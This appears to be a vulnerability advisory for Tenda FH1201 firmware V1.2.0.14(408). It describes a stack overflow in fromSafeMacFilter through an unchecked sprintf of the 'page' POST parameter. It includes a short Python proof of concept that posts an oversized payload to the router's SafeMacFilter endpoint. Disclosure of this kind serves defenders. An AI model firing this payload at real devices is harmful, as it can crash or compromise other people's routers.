Overview

• Firmware download website: https://www.tendacn.com/download/detail-3322.html

Affected version

FH1201 Firmware V1.2.0.14(408)

Vulnerability details

The Tenda FH1201 Firmware V1.2.0.14(408) has a stack overflow vulnerability located in the fromSafeMacFilter . This function accepts the page parameter from a POST request. The statement sprintf(v11, "firewall_mac.asp?page=%s", v8); leads to a buffer overflow. The user-supplied page can exceed the capacity of the v11 array, thus triggering this security vulnerability.

POC

import requests
​
ip = "192.168.84.101"
url = "http://" + ip + "/goform/SafeMacFilter"
payload = b"a"*1000
​
data = {"page": payload, "menufacturer": "1"}
response = requests.post(url, data=data)
print(response.text)